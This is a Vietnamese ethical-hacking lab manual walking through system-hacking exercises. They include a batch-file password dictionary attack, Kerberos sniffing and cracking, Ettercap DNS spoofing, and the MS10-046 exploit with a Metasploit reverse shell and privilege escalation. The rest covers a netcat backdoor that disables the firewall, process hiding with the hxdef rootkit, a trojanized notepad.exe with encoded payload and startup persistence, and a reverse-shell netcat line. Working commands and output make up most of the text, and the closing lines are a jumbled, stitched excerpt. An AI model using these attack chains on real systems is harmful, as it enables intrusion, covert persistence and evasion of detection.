Athena Ethical Hacker Lab System Hacking Module Password Attack Crunch Dictionary Netcat Backdoor System Hacking [Type text] Page Bài:PASSWORD ATTACK Sử dụng FOR LOOP DICTIONARY ATTACK - Mô hình lab - Để kết nối đến máy tính thơng qua mạng hệ điều hành Window ta sử dụng câu lệnh “net use” C:\> net use \\192.168.1.100 password /u:administrator - Sau trình kết nối thành cơng ta sử dụng tài ngun máy 192.168.1.100 ta có session với quyền administrator Tiếp theo ta sử dụng Psexe để gọi cmd.exe máy 192.168.1.100 - Tuy nhiên ta sử dụng đoạn script đơn giản bên để kết nối đến máy 192.168.1.100 với thông số username password lưu trữ file credentials.txt Ví dụ ta tạo file có tên for.bat có nội dung giống bên @echo off FOR /F "tokens=1,2*" %%i in (credentials.txt)^ net use \\192.168.1.100\IPC$ %%j /u:%%i^ 2>\>nul^ && echo %time% %date% >\> ketqua.txt^ Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân && echo \\192.168.1.100 user:%%i password:%%j >\> ketqua.txt - Cuối ta thử thực thi đoạn scripts với đối tượng PC có IP 192.168.1.100 Kerberos Attack - Ta có mơ hình Lab sau DOMAIN CONTROLLER 192.168.1.100/24 192.168.1.1/24 VICTIM ATTACKER 192.168.1.200/24 - Các bước chuẩn bị  Máy VICTIM Window XP, Server Window 2003, gán IP theo sơ đồ  Máy attacker sử dụng Window ( gán IP theo sơ đồ ) cài đặt chương trình + KerbSniff KerbCrack + Cain abel Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân - Các bước thực  Máy attacker kích hoạt chương trình Kerbsniff để sniffer traffic  Nhập vào câu lệnh kerbsniff.exe capture.txt nghĩa sniff ghi kết thành file capture.txt Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân  Attacker sử dụng chương trình Cain Abel để scan đường mạng xung quanh Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân  thực ARP Poisonning IP 192.168.1.100 192.168.1.200  Máy XP thực q trình join vào domain nhập thơng tin xác thực Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân - Lúc ta thấy cửa sổ chương trình kerbsniff xuất dấu * Mỗi dấu * tương ứng với gói tin xác thực kerberos Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân - Tại máy Window XP thực trình login vào - Tại máy attacker sử dụng chương trình kerbcrack để crack gói tin kerberos xác thực câu lệnh “kerbcrack.exe capture.txt –d password.txt ” Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Sử Dụng Hydra - Hydra Medusa hai chương trình thực online password attack thơng dụng Hai chương trình install sẵn Back Track - Ta cài đặt chương trình Hydra phiên 6.4 từ source Đầu tiên ta cài đặt thư viện cần thiết cho chương trình root@nhanld-laptop:/# sudoapt-getinstall build-essential linux-headers-$(uname -r) libgtk2.0-dev libssl-dev cmake -Tuy nhiên chương trình hydra khơng tương thích với libssh Ubuntu Vì ta install libssh manually root@nhanld-laptop:/# cd /home/nhanld/Download root@nhanld-laptop:/home/nhanld/Downloads# wget -c http://www.libssh.org/files/0.4/libssh-0.4.6.tar.gz root@nhanld-laptop:/home/nhanld/Downloads# tar -xvzf libssh- Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân 0.4.6.tar.gz root@nhanld-laptop:/home/nhanld/Downloads# cd libssh-0.4.6 root@nhanld-laptop:/home/nhanld/Downloads# mkdir build root@nhanld-laptop:/home/nhanld/Downloads# cd build root@nhanld-laptop:/home/nhanld/Downloads# cmake DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug root@nhanld-laptop:/home/nhanld/Downloads# make root@nhanld-laptop:/home/nhanld/Downloads# sudo make install -Download phiên Hydra 6.4 phiên 5.9 root@nhanld-laptop:/home/nhanld/Downloads # tar xvf hydra-6.4src.tar.gz root@nhanld-laptop:/home/nhanld/Downloads # cd hydra-6.4-src root@nhanld-laptop:/home/nhanld/Downloads/hydra-6.4-src # mkdir /opt/hydra root@nhanld-laptop:/home/nhanld/Downloads/hydra-6.4-src # /configure prefix=/opt/hydra root@nhanld-laptop:/home/nhanld/Downloads/hydra-6.4-src # make root@nhanld-laptop:/home/nhanld/Downloads/hydra-6.4-src # make install - Mơ hình lab sau - Máy attacker sử dụng Backtrack máy linux cài đặt chương trình Hydra Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân II Các bước thực Chuẩn bị Metasploit - Ta sử dụng lỗi shortcut Ms10-046 để khai thác lỗi, ta thực sau: root@bt:/pentest/exploits/framework3# msfconsole msf >search lnk msf >use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf >set payload windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) >set LHOST 192.168.1.10 LHOST => 192.168.1.10 msf exploit(ms10_046_shortcut_icon_dllloader) >set SRVHOST 192.168.1.10 msf exploit(ms10_046_shortcut_icon_dllloader) >exploit -j [*] Exploit running as background job [*] Started reverse handler on 192.168.1.10:4444 [*] [*] Send vulnerable clients to \\192.168.1.10\EPzSUxdEj\ [*] Or, get clients to save and render the icon of http:///.lnk [*] [*] Using URL: http://192.168.1.10:80/ Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân [*] Server started - Bây để client connect vào server 192.168.1.0 Ta chọn giải pháp sử dụng DNS spoofing Cấu hình Ettercap DNS Spoofing - Ta cấu hình file etter.dns (/usr/share/ettercap/etter.dns) với IP trang www.google.com IP attacker 192.168.1.10 cách thêm vào dòng sau www.google.com A 192.168.1.10 www.google.com PTR 192.168.1.10 - Thực trình dns spoofing Ettercap -T -q –M arp:remote –P dns_spoof –i eth0 /192.168.1.11/ // - Tại máy client nhập vào trang web www.google.com hình giống bên Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Kiểm tra metasploit - Metasploit trả cho ta dòng log bên msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Sending UNC redirect to 192.168.1.11:1655 [*] Sending UNC redirect to 192.168.1.11:1655 [*] Responding to WebDAV OPTIONS request from 192.168.1.11:1660 [*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj [*] Sending 301 for /EPzSUxdEj [*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/ [*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj [*] Sending 301 for /EPzSUxdEj [*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj/ Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân [*] Sending directory multistatus for /EPzSUxdEj/ [*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj [*] Sending 301 for /EPzSUxdEj [*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/ [*] Received WebDAV PROPFIND request from 192.168.1.11:1661 /EPzSUxdEj [*] Sending 301 for /EPzSUxdEj [*] Received WebDAV PROPFIND request from 192.168.1.11:1661 /EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/ [*] Received WebDAV PROPFIND request from 192.168.1.11:1663 /EPzSUxdEj [*] Sending 301 for /EPzSUxdEj [*] Received WebDAV PROPFIND request from 192.168.1.11:1663 /EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/ [*] Received WebDAV PROPFIND request from 192.168.1.11:1663 /EPzSUxdEj/desktop.ini [*] Sending 404 for /EPzSUxdEj/desktop.ini [*] Sending LNK file to 192.168.1.11:1663 [*] Received WebDAV PROPFIND request from 192.168.1.11:1663 /EPzSUxdEj/vncuNN.dll.manifest [*] Sending 404 for /EPzSUxdEj/vncuNN.dll.manifest [*] Sending DLL payload 192.168.1.11:1663 [*] Received WebDAV PROPFIND request from 192.168.1.11:1663 /EPzSUxdEj/vncuNN.dll.123.Manifest [*] Sending 404 for /EPzSUxdEj/vncuNN.dll.123.Manifest [*] Sending stage (752128 bytes) to 192.168.1.11 [*] Meterpreter session opened (192.168.1.10:4444 -> 192.168.1.11:1664) at 2011-07-20 10:22:16 +0700 msf exploit(ms10_046_shortcut_icon_dllloader) >sessions -l Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Active sessions =============== Id Type Information Connection meterpreter x86/win32 NHANLD-XP\nhanld @ NHANLD-XP 192.168.1.10:4444 -> 192.168.1.11:1664 msf exploit(ms10_046_shortcut_icon_dllloader) >sessions -i [*] Starting interaction with - Kiểm tra số thông tin máy victim nâng quyền meterpreter >getuid Server username: NHANLD-XP\nhanld meterpreter >getprivs ============================================================ Enabled Process Privileges ============================================================ SeDebugPrivilege SeIncreaseQuotaPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemProfilePrivilege SeSystemtimePrivilege SeProfileSingleProcessPrivilege SeIncreaseBasePriorityPrivilege Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân SeCreatePagefilePrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeRemoteShutdownPrivilege SeUndockPrivilege SeManageVolumePrivilege meterpreter >getsystem got system (via technique 1) meterpreter >getuid Server username: NT AUTHORITY\SYSTEM Sử Dụng Netcat làm backdoor hxdef100 rootkit - Ta chuẩn bi sẵn file nc.exe để upload File BT5 nằm vị trí /pentest/windows-binaries/tools meterpreter >pwd C:\DOCUME~1\nhanld\LOCALS~1\Temp meterpreter >cd C:\\WINDOWS\\Help meterpreter >mkdir netcat Creating directory: netcat meterpreter > cd netcat meterpreter >pwd C:\WINDOWS\Help\netcat meterpreter >upload /pentest/windows-binaries/tools/nc.exe Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân [*] uploading : /pentest/windows-binaries/tools/nc.exe -> [*] uploaded : /pentest/windows-binaries/tools/nc.exe -> \nc.exe - Ta tạo file nc_scripts.bat có nội dung đơn giản sau @echo off netsh firewall set opmode disable nc.exe -l -v -p 4444 -e cmd.exe - Tạo file nc_scripts.vbs có nội dung sau Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "C:\WINDOWS\Help\netcat\nc_scripts.bat" & Chr(34), Set WshShell = Nothing - Upload file vào máy victim meterpreter >upload /root/Desktop/nc_scripts.bat [*] uploading : /root/Desktop/nc_scripts.bat -> [*] uploaded : /root/Desktop/nc_scripts.bat -> \nc_scripts.bat meterpreter >upload /root/Desktop/nc_scripts.vbs [*] uploading : /root/Desktop/nc_scripts.vbs -> [*] uploaded : /root/Desktop/nc_scripts.vbs -> \nc_scripts.vbs - Ta sử dụng metasploit upload file folder vào C:\WINDOWS\Help - Tiếp tục ta upload rootkit hxdef100: bao gồm file cấu hình file thực thi Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân + file cấu hình để ẩn process chương trình nc.exe file thực thi chương trình meterpreter >upload /root/Desktop/hxdef100.ini [*] uploading : /root/Desktop/hxdef100.ini -> [*] uploaded : /root/Desktop/hxdef100.ini -> \hxdef100.ini meterpreter >upload /root/Desktop/hxdef100.exe [*] uploading : /root/Desktop/hxdef100.exe -> [*] uploaded : /root/Desktop/hxdef100.exe -> \hxdef100.exe - Start netcat backdoor thông qua nc_scripts.vbs ( start chương trình nc.exe cmd.exe ) rootkit meterpreter >shell Process 2868 created Channel 28 created Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp C:\WINDOWS\Help\netcat>start nc_scripts.vbs start nc_scripts.vbs - Kiểm tra port tiến trình hoạt động máy lệnh netstat – ano tasklist ta thấy port dịch vụ bất thường Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân - Khởi động rootkit để ẩn process nc.exe ẩn file thực thi chương trình netcat C:\WINDOWS\Help\netcat>start hxdef100.exe start hxdef100.exe - Ta kiểm tra lại process thấy tiến trình nc.exe ẩn Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân - Attacker sử dụng chương trình telnet chương trình netcat để connect điều khiển máy attacker root@bt:/opt/framework3/msf3# telnet 192.168.1.11 4444 Trying 192.168.1.11 Connected to 192.168.1.11 Escape character is '^]' Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp C:\WINDOWS\Help\netcat> C:\WINDOWS\Help\netcat> Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Tạo backdoor upload metasploit - Ta chuẩn bị file để ghép backdoor vào Ví dụ ta sử dụng chương trình notepad.exe - Sử dụng câu lệnh sau để tạo backdoor root@bt:/opt/framework3/msf3# /msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4455 R | /msfencode -e x86/shikata_ga_nai -c -t exe -x /root/Desktop/NOTEPAD.EXE o /root/Desktop/backdoor_notepad.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) - Trong metepreter ta sử dụng câu lệnh run scheduleme để upload backdoor cho backdoor startup với hệ thống meterpreter >run scheduleme –h  Để hiển thị giúp đỡ câu lệnh meterpreter >run scheduleme -e /root/Desktop/backdoor_notepad.exe -s [*] Uploading /root/Desktop/backdoor_notepad.exe [*] /root/Desktop/backdoor_notepad.exe uploaded! Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân [*] Scheduling command C:\DOCUME~1\nhanld\LOCALS~1\Temp\svhost72.exe to run startup [*] The scheduled task has been successfully created [*] For cleanup run schtasks /delete /tn syscheck15 /F - Lúc backdoor notepad kích hoạt, ta tiếp tục sử dụng tính multi/handler để chờ đợi kết nối victim msf exploit(ms10_046_shortcut_icon_dllloader) >use exploit/multi/handler msf exploit(handler) >set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 192.168.1.10 msf exploit(handler) >set LPORT 4455 LPORT => 4455 msf exploit(handler) >exploit -j [*] Exploit running as background job - Restart lại máy victim, lúc kết nối mà ta sử dụng thông qua lỗi ms10-046 bị Sau victim tự động tạo reverser connection đến máy victim msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.11 [*] Meterpreter session opened (192.168.1.10:4455 -> 192.168.1.11:1025) at 2011-07-20 12:08:20 +0700 - Nếu ta kiểm tra dịch vụ kết nối máy client ta thấy điều bất thường dịch vụ lạ xuất Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân ... máy attacker port 5555 C: etcat>nc.exe -v 172.16 .30 .39 5555 -e cmd.exe Tài Liệu Học Hacker Mũ Trắng-AEH ATHENA.GV: Lê Đình Nhân Bài : System Hacking I Mục tiêu lab - Mơ hình lab - Mục đích lab:... payload 192.168.1.11:16 63 [*] Received WebDAV PROPFIND request from 192.168.1.11:16 63 /EPzSUxdEj/vncuNN.dll.1 23. Manifest [*] Sending 404 for /EPzSUxdEj/vncuNN.dll.1 23. Manifest [*] Sending stage... - Install file từ source gói tin #tar xvf crunch -3. 0.1.tgz && cd crunch -3. 0/ #make #make install - Để uninstall chương trình crunch #cd crunch -3. 0 #make uninstall Deleting binary and manpages